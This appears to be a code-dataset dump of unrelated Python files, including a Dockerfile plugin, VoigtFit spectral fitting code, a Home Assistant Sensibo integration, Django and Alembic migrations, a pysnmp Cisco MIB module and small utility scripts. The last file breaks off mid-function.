content stringlengths 5 1.05M |
|---|
"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
It returns content of dockerfile and therefore displays it in results.
"""
from dockerfile_parse import DockerfileParser
from atomic_reactor.plugin import PreBuildPlugin
class CpDockerfilePlugin(PreBuildPlugin):
key = "dockerfile_content"
def __init__(self, tasker, workflow):
"""
constructor
:param tasker: DockerTasker instance
:param workflow: DockerBuildWorkflow instance
:return:
"""
# call parent constructor
super(CpDockerfilePlugin, self).__init__(tasker, workflow)
def run(self):
"""
try open dockerfile, output an error if there is one
"""
try:
return DockerfileParser(self.workflow.builder.df_path).content
except (IOError, OSError) as ex:
return "Couldn't retrieve dockerfile: %r" % ex
|
# -*- coding: UTF-8 -*-
__author__ = 'Jens-Kristian Krogager'
from builtins import input
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
from scipy.interpolate import UnivariateSpline as spline
from scipy.interpolate import RectBivariateSpline as spline2d
import os
from VoigtFit.funcs.voigt import evaluate_profile
root_path = os.path.dirname(os.path.abspath(__file__))
root_path = '/'.join(root_path.split('/')[:-1])
datafile = root_path + '/static/telluric_em_abs.npz'
telluric_data = np.load(datafile)
def get_FWHM(y, x=None):
"""
Measure the FWHM of the profile given as `y`.
If `x` is given, then report the FWHM in terms of data units
defined by the `x` array. Otherwise, report pixel units.
Parameters
----------
y : np.ndarray, shape (N)
Input profile whose FWHM should be determined.
x : np.ndarray, shape (N) [default = None]
Input data units, must be same shape as `y`.
Returns
-------
fwhm : float
FWHM of `y` in units of pixels.
If `x` is given, the FWHM is returned in data units
corresponding to `x`.
"""
if x is None:
x = np.arange(len(y))
half = max(y)/2.0
signs = np.sign(np.add(y, -half))
zero_crossings = (signs[0:-2] != signs[1:-1])
zero_crossings_i = np.where(zero_crossings)[0]
if np.sum(zero_crossings) > 2:
raise ValueError('Invalid profile! More than 2 crossings detected.')
elif np.sum(zero_crossings) < 2:
raise ValueError('Invalid profile! Less than 2 crossings detected.')
else:
pass
halfmax_x = list()
for i in zero_crossings_i:
x_i = x[i] + (x[i+1] - x[i]) * ((half - y[i]) / (y[i+1] - y[i]))
halfmax_x.append(x_i)
fwhm = halfmax_x[1] - halfmax_x[0]
return fwhm
def linfunc(x, a, b):
"""Linear fitting function of first order."""
return a*x + b
def load_lsf(lsf_fname, wl, nsub=1):
"""
Load a Line-Spread Function table following format from HST:
First line gives wavelength in Angstrom and the column below
each given wavelength defines the kernel in pixel space::
wl1 wl2 wl3 ... wlN
lsf11 lsf21 lsf31 ... lsfN1
lsf12 lsf22 lsf32 ... lsfN2
:
:
lsf1M lsf2M lsf3M ... lsfNM
Parameters
----------
lsf_fname : string
The filename containing the LSF data.
wl : array like, shape (N)
The wavelength grid onto which the LSF will be evaluated
nsub : integer [default = 1]
Kernel subsampling factor relative to the data.
This is only used if the resolution is given as a LSF file.
Returns
-------
kernel : np.array, shape(N, M)
A grid of interpolated LSF evaluated at each given input wavelength
of the array `wl` of shape N, where M is the number of pixels in the LSF.
Notes
-----
The output kernel is transposed with respect to the input format
for ease of computation in the convolution since indexing is faster
along rows than columns.
"""
if nsub > 1:
wl = np.linspace(wl.min(), wl.max(), nsub*len(wl))
lsf_tab = np.loadtxt(lsf_fname)
# Get the wavelength array from the first line in the file:
lsf_wl = lsf_tab[0]
# The LSF data is the resulting table excluding the first line:
lsf = lsf_tab[1:, :]
# Normalize the LSF:
lsf_norm = np.sum(lsf, axis=0)
lsf = lsf/lsf_norm
# Make an array of pixel indeces:
lsf_pix = np.arange(lsf.shape[0])
# Linearly interpolate the LSF grid:
LSF = spline2d(lsf_pix, lsf_wl, lsf, kx=1, ky=1)
kernel = LSF(lsf_pix, wl).T
return kernel
class Region():
def __init__(self, velspan, specID, line=None):
"""
A Region contains the fitting data, exclusion mask and line information.
The class is instantiated with the velocity span, `velspan`, and a spectral ID
pointing to the raw data chunk from `DataSet.data`,
and can include a :class:`dataset.Line` instance for the first line
belonging to the region.
.. rubric:: Attributes
velspan : Tuple(float, float)
The velocity ranges used for the fitting region. Given as a range by a tuple of (lower, upper).
lines : list(:class:`dataset.Line`)
A list of Lines defined in the region.
label : str
A LaTeX label describing the lines in the region for plotting purposes.
res : float
Spectral resolution of the region in km/s.
wl : array_like, shape (N)
Data array of wavelengths in Ångstrøm.
flux : array_like, shape (N)
Data array of fluxes (normalized if :attr:`normalized` is `True`).
err : array_like, shape (N)
Array of uncertainties for each flux element.
normalized : bool
`True` if the data in the region are normlized.
mask : array_like, shape (N)
Exclusion mask for the region:
0/`False` = pixel is *not* included in the fit.
1/`True` = pixel is included in the fit.
new_mask : bool
Internal parameter for :meth:`VoigtFit.DataSet.prepare_dataset`.
If `True`, an interactive masking process will be initiated in the
preparation stage.
cont_err : float
An estimate of the uncertainty in the continuum fit.
specID : str
A spectral identifier to point back to the raw data chunk.
"""
if hasattr(velspan, '__iter__'):
if len(velspan) == 2:
pass
else:
raise ValueError("argument 'velspan' must have two values! not %i" % len(velspan))
else:
velspan = (-1.*np.abs(velspan), np.abs(velspan))
self.velspan = velspan
self.specID = specID
if line:
self.lines = [line]
else:
self.lines = list()
self.label = ''
self.res = None
self.err = None
self.flux = None
self.wl = None
self.normalized = False
self.cont_err = 0.
self.mask = None
self.new_mask = False
self.kernel = None
self.kernel_fwhm = None
self.kernel_nsub = 1
def add_data_to_region(self, data_chunk, cutout):
"""
Define the spectral data for the fitting region.
Parameters
----------
data_chunk : dict()
A `data_chunk` as defined in the data structure of :meth:`DataSet.data
<VoigtFit.DataSet.add_data>`.
cutout : bool array
A boolean array defining the subset of the `data_chunk` which makes up the fitting region.
"""
self.res = data_chunk['res']
self.err = data_chunk['error'][cutout]
self.flux = data_chunk['flux'][cutout]
self.wl = data_chunk['wl'][cutout]
self.normalized = data_chunk['norm']
self.cont_err = 0.
self.mask = data_chunk['mask'][cutout]
self.kernel_nsub = data_chunk['nsub']
if np.sum(self.mask) == len(self.mask):
# If all pixels are 1 in the given mask,
# let the user define new_mask in `prepare_dataset`:
self.new_mask = True
else:
self.new_mask = False
if isinstance(self.res, str):
self.kernel = load_lsf(self.res, self.wl, nsub=self.kernel_nsub)
i0 = self.kernel.shape[0] // self.kernel_nsub // 2
kernel_0 = self.kernel[i0]
# Get FWHM in pixel units:
fwhm = get_FWHM(kernel_0)
lambda0 = self.wl[i0]
dx0 = np.diff(self.wl)[i0]
# Calculate FWHM in km/s:
self.kernel_fwhm = 299792.458 / lambda0 * (fwhm * dx0)
else:
# `res` is a float, already given as FWHM in km/s
self.kernel = float(self.res)
self.kernel_fwhm = float(self.res)
def add_line(self, line):
"""Add a new :class:`dataset.Line` to the fitting region."""
self.lines.append(line)
def has_line(self, line_tag):
"""Return `True` if a line with the given `line_tag` is defined in the region."""
for line in self.lines:
if line.tag == line_tag:
return True
return False
def has_active_lines(self):
"""Return `True` is at least one line in the region is active."""
active_lines = [line.active for line in self.lines]
if np.any(active_lines):
return True
return False
def remove_line(self, line_tag):
"""Remove absorption line with the given `line_tag` from the region."""
if self.has_line(line_tag):
for num, line in enumerate(self.lines):
if line.tag == line_tag:
num_to_remove = num
self.lines.pop(num_to_remove)
def normalize(self, plot=True, norm_method='linear', z_sys=None):
"""
Normalize the region if the data are not already normalized.
Choose from two methods:
1: define left and right continuum regions
and fit a linear continuum.
2: define the continuum as a range of points
and use spline interpolation to infer the
continuum.
If `z_sys` is not `None`, show the region in velocity space using
instead of wavelength space.
"""
if norm_method in ['linear', 'spline']:
pass
else:
err_msg = "Invalid norm_method: %r" % norm_method
raise ValueError(err_msg)
plt.close('all')
plt.figure()
x = self.wl.copy()
x_label = u"Wavelength [Å]"
if z_sys is not None:
# Calculate velocity:
l0 = self.lines[0].l0 * (z_sys + 1.)
x = (x - l0)/l0 * 299792.458
x_label = "Rel. Velocity [km s$^{-1}$]"
dx = 0.1*(x.max() - x.min())
lines_title_string = ", ".join([line.tag for line in self.lines])
plt.xlim(x.min()-dx, x.max()+dx)
plt.ylim(0.8*self.flux.min(), 1.2*self.flux.max())
plt.plot(x, self.flux, color='k', drawstyle='steps-mid',
label=lines_title_string)
plt.xlabel(x_label)
plt.legend()
if norm_method == 'linear':
# - Normalize by defining a left and right continuum region
print("\n Mark continuum region on the *left* side of the absorption, (left and right boundary)")
plt.title("Mark continuum region on the *left* side of the absorption")
plt.tight_layout()
plt.draw()
bounds = plt.ginput(2, -1)
if len(bounds) != 2:
return 0
left_bound = min(bounds[0][0], bounds[1][0])
right_bound = max(bounds[0][0], bounds[1][0])
if left_bound >= right_bound:
print(" [ERROR] - Left and Right boundaries too small!\n")
return 0
region1 = (x >= left_bound)*(x <= right_bound)
fit_wl = x[region1]
fit_flux = self.flux[region1]
print(" Mark continuum region on the *right* side of the absorption")
plt.title("Mark continuum region on the *right* side of the absorption")
plt.tight_layout()
plt.draw()
bounds = plt.ginput(2)
if len(bounds) != 2:
return 0
left_bound = min(bounds[0][0], bounds[1][0])
right_bound = max(bounds[0][0], bounds[1][0])
if left_bound >= right_bound:
print(" [ERROR] - Left and Right boundaries too small!\n")
return 0
region2 = (x >= left_bound)*(x <= right_bound)
fit_wl = np.concatenate([fit_wl, x[region2]])
fit_flux = np.concatenate([fit_flux, self.flux[region2]])
if len(fit_wl) < 4 or len(fit_flux) < 4:
print(" [ERROR] - Not enough pixels were selected. Select larger regions...\n")
return 0
elif len(fit_wl) != len(fit_flux):
print(" [ERROR] - Something went wrong. The data arrays do not have the same shape!")
print(" Try again...\n")
return 0
popt, pcov = curve_fit(linfunc, fit_wl, fit_flux)
continuum = linfunc(x, *popt)
e_continuum = np.std(fit_flux - linfunc(fit_wl, *popt)) / np.sqrt(len(fit_wl)-2)
elif norm_method == 'spline':
# Normalize by drawing the continuum and perform spline
# interpolation between the points
print("\n Select at least 3 spline points over the whole range to define the continuum")
plt.title("Select at least 3 spline points over the whole range to define the continuum")
plt.tight_layout()
plt.draw()
points = plt.ginput(n=-1, timeout=-1)
if len(points) < 3:
return 0
points = np.array(points)
x_points = points[:, 0]
y_points = points[:, 1]
cont_spline = spline(x_points, y_points)
continuum = cont_spline(x)
e_continuum = np.sqrt(np.median(self.err**2)/len(x_points))
else:
return 0
if plot:
new_flux = self.flux/continuum
new_err = self.err/continuum
if norm_method == 'spline':
plt.plot(x_points, y_points, ls='', color='b', marker='o', alpha=0.8)
else:
plt.axvspan(x[region1].min(), x[region1].max(), color='b', alpha=0.3)
plt.axvspan(x[region2].min(), x[region2].max(), color='b', alpha=0.3)
plt.plot(x, continuum, color='r', ls='--', lw=2., alpha=0.8)
plt.plot(x, continuum+e_continuum, color='r', ls=':', lw=1., alpha=0.8)
plt.plot(x, continuum-e_continuum, color='r', ls=':', lw=1., alpha=0.8)
plt.title("Go back to terminal...")
plt.tight_layout()
plt.draw()
prompt = str(input(" Is normalization correct? (YES/no) "))
if prompt.lower() in ['', 'y', 'yes']:
self.flux = new_flux
self.err = new_err
self.cont_err = e_continuum / np.median(continuum)
self.normalized = True
return 1
else:
return 0
else:
self.flux = self.flux / continuum
self.err = self.err / continuum
self.cont_err = e_continuum / np.median(continuum)
self.normalized = True
return 1
def define_mask(self, z=None, dataset=None, telluric=True, z_sys=None):
"""
Use an interactive window to define the mask for the region.
Parameters
----------
z : float [default = None]
If a redshift is given, the lines in the region are shown as vertical lines
at the given redshift.
dataset : :class:`VoigtFit.DataSet` [default = None]
A dataset with components defined for the lines in the region.
If a dataset is passed, the components of the lines in the region are shown.
telluric : bool [default = True]
Show telluric absorption and sky emission line templates during the masking.
z_sys : float [default = None]
If a systemic redshift is given, the region is displayed in velocity space
relative to the given systemic redshift instead of in wavelength space.
"""
plt.close('all')
x = self.wl.copy()
x_label = u"Wavelength [Å]"
if z_sys is not None:
# Calculate velocity:
l_ref = self.lines[0].l0 * (z_sys + 1.)
x = (x - l_ref) / l_ref * 299792.458
x_label = u"Rel. Velocity [${\\rm km\\ s^{-1}}$]"
plt.xlim(x.min(), x.max())
# plt.ylim(max(0, 0.8*self.flux.min()), 1.2)
lines_title = ", ".join([line.tag for line in self.lines])
masked_spectrum = np.ma.masked_where(self.mask, self.flux)
plt.plot(x, self.flux, color='k', drawstyle='steps-mid', lw=0.5,
label=lines_title)
plt.xlabel(x_label)
mask_line = plt.plot(x, masked_spectrum, color='r', lw=1.5,
drawstyle='steps-mid', zorder=0)
plt.legend()
if telluric:
x_T = telluric_data['wl']
cutout = (x_T > self.wl.min()) * (x_T < self.wl.max())
flux_T = telluric_data['em'][cutout]
abs_T = telluric_data['abs'][cutout]
x_T = x_T[cutout]
if self.normalized:
cont = 1.
else:
cont = np.median(self.flux)
if z_sys is not None:
x_T = (x_T - l_ref) / l_ref * 299792.458
plt.plot(x_T, abs_T*1.2*cont, color='crimson', alpha=0.7, lw=0.5)
# -- Test if telluric template is defined in this region:
if len(flux_T) > 0 and (flux_T.max() != 0):
plt.plot(x_T, (flux_T / flux_T.max() + 1.2)*cont,
color='orange', alpha=0.7, lw=0.5)
if z is not None:
for line in self.lines:
# Load line properties
l0, f, gam = line.get_properties()
if dataset is not None:
ion = line.ion
if ion in dataset.components:
n_comp = len(dataset.components[ion])
else:
n_comp = 0
ion = ion.replace('*', 'x')
for n in range(n_comp):
z = dataset.pars['z%i_%s' % (n, ion)].value
if z_sys is not None:
plt.axvline((l0*(z+1) - l_ref) / l_ref * 299792.458,
ls=':', color='r', lw=0.4)
else:
plt.axvline(l0*(z+1), ls=':', color='r', lw=0.4)
else:
if z_sys is not None:
plt.axvline((l0*(z+1) - l_ref)/l_ref * 299792.458,
ls=':', color='r', lw=0.4)
else:
plt.axvline(l0*(z+1), ls=':', color='r', lw=0.4)
plt.title("Mark left and right boundary of regions to mask\n[press ENTER when done]")
print("\n\n Mark left and right boundary of regions to mask [press ENTER when done]")
plt.tight_layout()
plt.draw()
ok = 0
mask_vlines = list()
while ok >= 0:
sel = plt.ginput(0, timeout=-1)
if len(sel) > 0 and len(sel) % 2 == 0:
mask = self.mask.copy()
sel = np.array(sel)
selections = np.column_stack([sel[::2, 0], sel[1::2, 0]])
for x1, x2 in selections:
cutout = (x >= x1)*(x <= x2)
mask[cutout] = False
mask_vlines.append(plt.axvline(x1, color='r', ls='--'))
mask_vlines.append(plt.axvline(x2, color='r', ls='--'))
masked_spectrum = np.ma.masked_where(mask, self.flux)
mask_line = plt.plot(x, masked_spectrum, color='r', drawstyle='steps-mid')
plt.draw()
prompt = str(input(" Are the masked regions correct? (YES/no/clear)"))
if prompt.lower() in ['', 'y', 'yes']:
ok = -1
self.mask = mask
self.new_mask = False
elif prompt.lower() in ['c', 'clear']:
ok = 0
self.mask = np.ones_like(mask, dtype=bool)
for linesegment in mask_line:
linesegment.remove()
mask_line = list()
for linesegment in mask_vlines:
linesegment.remove()
mask_vlines = list()
else:
self.mask = mask
ok += 1
elif len(sel) == 0:
print("\n No masks were defined.")
prompt = str(input(" Continue? (yes/no)"))
if prompt.lower() in ['', 'y', 'yes']:
ok = -1
self.new_mask = False
else:
ok += 1
plt.close()
def set_mask(self, mask):
err_msg = " Mask must have same size as region!"
assert len(mask) == len(self.flux), err_msg
self.mask = mask
def clear_mask(self):
"""Clear the already defined mask in the region."""
self.mask = np.ones_like(self.wl, dtype=bool)
self.new_mask = True
def unpack(self):
"""Return the data of the region (wl, flux, error, mask)"""
return (self.wl, self.flux, self.err, self.mask)
def is_normalized(self):
"""Return `True` if the region data is normalized."""
return self.normalized
def set_label(self, text):
"""Set descriptive text label for the given region."""
self.label = text
def generate_label(self, active_only=True, ignore_finelines=True):
"""Automatically generate a descriptive label for the region."""
transition_lines = list()
if active_only and not ignore_finelines:
for line in self.lines:
if line.active is True:
transition_lines.append(line.tag)
elif active_only and ignore_finelines:
for line in self.lines:
if line.active is True and line.ion[-1].isupper():
transition_lines.append(line.tag)
elif not active_only and ignore_finelines:
for line in self.lines:
if line.ion[-1].isupper():
transition_lines.append(line.tag)
else:
for line in self.lines:
transition_lines.append(line.tag)
all_trans_str = [r"${\rm "+trans.replace('_', r'\ \lambda')+"}$"
for trans in transition_lines]
line_string = "\n".join(all_trans_str)
self.label = line_string
def get_velocity(self, z_sys, line=None):
"""
Return the relative velocities of the region,
with respect to systemtic redshift of the given `line`.
"""
if line is None:
line = self.lines[0]
elif isinstance(line, str):
line_tags = [this_line.tag for this_line in self.lines]
if line in line_tags:
idx = line_tags.index(line)
line = self.lines[idx]
else:
assert line in self.lines, "The line is not defined in the region!"
lcen = line.l0 * (z_sys + 1)
vel = (self.wl - lcen) / lcen * 299792.458
return vel
def evaluate_region(self, pars, wl=None, z_sys=None, sampling=3, lines=None):
if lines is None:
lines = self.lines
if wl is None:
wl = self.wl
profile = evaluate_profile(wl, pars, lines, self.kernel,
z_sys=z_sys, sampling=sampling, kernel_nsub=self.kernel_nsub)
return profile
|
"""The sensibo component."""
from __future__ import annotations
import asyncio
import logging
import aiohttp
import async_timeout
import pysensibo
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from .const import _INITIAL_FETCH_FIELDS, DOMAIN, PLATFORMS, TIMEOUT
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up Sensibo from a config entry."""
client = pysensibo.SensiboClient(
entry.data[CONF_API_KEY], session=async_get_clientsession(hass), timeout=TIMEOUT
)
devicelist = []
try:
async with async_timeout.timeout(TIMEOUT):
for dev in await client.async_get_devices(_INITIAL_FETCH_FIELDS):
devicelist.append(dev)
except (
aiohttp.client_exceptions.ClientConnectorError,
asyncio.TimeoutError,
pysensibo.SensiboError,
) as err:
raise ConfigEntryNotReady(
f"Failed to get devices from Sensibo servers: {err}"
) from err
if not devicelist:
return False
hass.data.setdefault(DOMAIN, {})[entry.entry_id] = {
"devices": devicelist,
"client": client,
}
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
_LOGGER.debug("Loaded entry for %s", entry.title)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload Sensibo config entry."""
if await hass.config_entries.async_unload_platforms(entry, PLATFORMS):
del hass.data[DOMAIN][entry.entry_id]
if not hass.data[DOMAIN]:
del hass.data[DOMAIN]
_LOGGER.debug("Unloaded entry for %s", entry.title)
return True
return False
|
# This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
import os
from multiprocessing import Pool
from GridCal.Engine.IO.file_handler import FileOpen
from GridCal.Engine.Simulations.PowerFlow.power_flow_worker import SolverType, multi_island_pf
from GridCal.Engine.Simulations.PowerFlow.power_flow_driver import PowerFlowOptions, PowerFlowDriver
def test_api_multi_core_starmap():
"""
Test the pool.starmap function together with GridCal
"""
file_name = os.path.join('..', '..', 'Grids_and_profiles', 'grids', 'IEEE 30 Bus with storage.xlsx')
batch_size = 100
grid = FileOpen(file_name).open()
print('\n\n', grid.name)
options = PowerFlowOptions(SolverType.NR, verbose=False)
power_flow = PowerFlowDriver(grid, options)
power_flow.run()
# create instances of the of the power flow simulation given the grid
print('running...')
pool = Pool()
results = pool.starmap(multi_island_pf, [(grid, options, 0)] * batch_size)
if __name__ == '__main__':
test_api_multi_core_starmap()
|
# Generated by Django 2.2.11 on 2020-03-24 17:48
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('facility', '0021_auto_20200324_0756'),
]
operations = [
migrations.CreateModel(
name='PatientTeleConsultation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symptoms', multiselectfield.db.fields.MultiSelectField(choices=[(1, 'NO'), (2, 'FEVER'), (3, 'SORE THROAT'), (4, 'COUGH'), (5, 'BREATHLESSNESS')], max_length=9)),
('other_symptoms', models.TextField(blank=True, null=True)),
('reason', models.TextField(blank=True, null=True, verbose_name='Reason for calling')),
('created_by', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PatientRegistration',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('age', models.PositiveIntegerField()),
('gender', models.IntegerField(choices=[(1, 'Male'), (2, 'Female'), (3, 'Other')])),
('phone_number', models.CharField(max_length=14, validators=[django.core.validators.RegexValidator(code='invalid_mobile', message='Please Enter 10/11 digit mobile number or landline as 0<std code><phone number>', regex='^((\\+91|91|0)[\\- ]{0,1})?[456789]\\d{9}$')])),
('contact_with_carrier', models.BooleanField(verbose_name='Contact with a Covid19 carrier')),
('medical_history', multiselectfield.db.fields.MultiSelectField(choices=[(1, 'NO'), (2, 'Diabetes'), (3, 'Heart Disease'), (4, 'HyperTension'), (5, 'Kidney Diseases')], max_length=9)),
('medical_history_details', models.TextField(blank=True, null=True)),
('created_by', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
from .dicomexplorer_old import DicomExplorer
|
#
# PySNMP MIB module CISCO-MEDIA-QUALITY-CAPABILITY (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-MEDIA-QUALITY-CAPABILITY
# Produced by pysmi-0.3.4 at Mon Apr 29 17:50:04 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, ValueSizeConstraint, SingleValueConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "SingleValueConstraint", "ConstraintsUnion")
ciscoAgentCapability, = mibBuilder.importSymbols("CISCO-SMI", "ciscoAgentCapability")
NotificationGroup, AgentCapabilities, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "AgentCapabilities", "ModuleCompliance")
Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, NotificationType, Bits, Integer32, IpAddress, Unsigned32, MibIdentifier, iso, ObjectIdentity, ModuleIdentity, Counter32, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "NotificationType", "Bits", "Integer32", "IpAddress", "Unsigned32", "MibIdentifier", "iso", "ObjectIdentity", "ModuleIdentity", "Counter32", "Gauge32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
ciscoMediaQualityCapability = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 7, 604))
ciscoMediaQualityCapability.setRevisions(('2011-09-23 00:00', '2011-04-15 00:00',))
if mibBuilder.loadTexts: ciscoMediaQualityCapability.setLastUpdated('201109230000Z')
if mibBuilder.loadTexts: ciscoMediaQualityCapability.setOrganization('Cisco Systems, Inc.')
ciscoMediaQualityCapabilityV152R01 = AgentCapabilities((1, 3, 6, 1, 4, 1, 9, 7, 604, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMediaQualityCapabilityV152R01 = ciscoMediaQualityCapabilityV152R01.setProductRelease('OS=IOS\n OSVERSION=15.2(1)T\n PLATFORM=c29xx,c3925,c3945,c3925E,c3945E\n INTERFACE=None')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMediaQualityCapabilityV152R01 = ciscoMediaQualityCapabilityV152R01.setStatus('current')
ciscoMediaQualityCapabilityV152R02 = AgentCapabilities((1, 3, 6, 1, 4, 1, 9, 7, 604, 2))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMediaQualityCapabilityV152R02 = ciscoMediaQualityCapabilityV152R02.setProductRelease('OS=IOS\n OSVERSION=15.2(2)T\n PLATFORM=c28xx,c3825,c3845,c29xx,c3925,c3945,c3925E,c3945E\n INTERFACE=None')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMediaQualityCapabilityV152R02 = ciscoMediaQualityCapabilityV152R02.setStatus('current')
mibBuilder.exportSymbols("CISCO-MEDIA-QUALITY-CAPABILITY", ciscoMediaQualityCapabilityV152R01=ciscoMediaQualityCapabilityV152R01, ciscoMediaQualityCapabilityV152R02=ciscoMediaQualityCapabilityV152R02, PYSNMP_MODULE_ID=ciscoMediaQualityCapability, ciscoMediaQualityCapability=ciscoMediaQualityCapability)
|
"""add in dutycycle gt
Revision ID: 9975c0e10837
Revises: 950cd7f3122a
Create Date: 2019-05-21 20:37:39.785501
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '9975c0e10837'
down_revision = '950cd7f3122a'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('DutyCycleGT',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=512), nullable=False),
sa.Column('trace', sa.String(length=512), nullable=False),
sa.Column('index', sa.String(length=32), nullable=False),
sa.Column('active', sa.String(length=32), nullable=True),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('DutyCycleGT')
# ### end Alembic commands ###
|
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Renames is_declining_review property
Revision ID: 8e530ce276a
Revises: 321f1d702be0
Create Date: 2015-03-03 16:43:22.942740
"""
# revision identifiers, used by Alembic.
revision = '8e530ce276a'
down_revision = '321f1d702be0'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column(
'cycle_task_entries', 'is_declining_review', new_column_name='_is_declining_review',
type_=sa.Boolean())
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column(
'cycle_task_entries', '_is_declining_review', new_column_name='is_declining_review',
type_=sa.Boolean())
### end Alembic commands ###
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-01-01 22:17
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('x', '0003_auto_20151226_2128'),
]
operations = [
migrations.AddField(
model_name='gpior2',
name='toggle_state',
field=models.CharField(choices=[(b'ON', b'ON'), (b'OFF', b'OFF')], default=b'', max_length=20),
),
migrations.AlterField(
model_name='gpior2',
name='pin',
field=models.IntegerField(choices=[(2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10), (11, 11), (12, 12), (13, 13), (14, 14), (15, 15), (16, 16), (17, 17), (19, 19), (18, 18), (20, 20), (21, 21), (22, 22), (23, 23), (24, 24), (25, 25), (26, 26), (27, 27)]),
),
]
|
#!/usr/bin/python3
from sqlite.sqlite import SQLite
__title__ = 'sqlite'
__version__ = '0.2.0'
__author__ = 'Muntashir Al-Islam'
__license__ = 'MIT'
__copyright__ = 'Copyright (c) 2015 Muntashir Al-Islam'
"""
SQLite Database handler in Python with PHP-MySQLi like syntax
start date: 19/10/2015
Email: muntashir.islam96@gmail.com
"""
|
f=raw_input('Enter valid file full pathname: ')
text=''''''
try:
with io.open(f,'r',encoding='utf8') as opf:
text11 = opf.read()
i=0
while i<len(text11):
if text11[i]==' ':
for j in range(i,len(text)):
if text11[j]!=' ':
break
i=j
text+=' '
else:
text+=text11[i]
i+=1
opf.close()
print 'Text saved is: '
print text
f=f[:-4]+'-spaceremove.txt'
with io.open(f,'w',encoding='utf8') as sf:
sf.write(text)
sf.close()
print 'File removed of consecutive blank spaces and saved with name: ',f
except Exception as e:
print 'Error!',e
|
from PIL import Image
from subprocess import Popen, PIPE
import cv2
fps, duration = 24, 10000
p = Popen(['ffmpeg', '-y', '-f', 'image2pipe', '-vcodec', 'mjpeg', '-r', '10', '-i', '-', '-vcodec:v', 'libx264', '-video_size', '1280x720', '-f', 'flv', '-strict', 'experimental', 'rtmp://localhost/show/stream'], stdin=PIPE)
cap = cv2.VideoCapture(0)
while True:
p.stdout.flush()
_, frame = cap.read()
im = Image.fromarray(frame, 'RGB')
im.save(p.stdin, 'JPEG')
p.stdin.close()
p.wait()
|
"""Utilities related to formatting job metrics for human consumption."""
from typing import (
Any,
NamedTuple,
)
class FormattedMetric(NamedTuple):
title: str
value: str
class JobMetricFormatter:
"""Format job metric key-value pairs for human consumption in Web UI."""
def format(self, key: Any, value: Any) -> FormattedMetric:
return FormattedMetric(str(key), str(value))
def seconds_to_str(value: int) -> str:
"""Convert seconds to a simple simple string describing the amount of time."""
mins, secs = divmod(value, 60)
hours, mins = divmod(mins, 60)
if value < 60:
return f"{secs} second{'s' if secs != 1 else ''}"
elif value < 3600:
return f"{mins} minute{'s' if mins != 1 else ''}"
else:
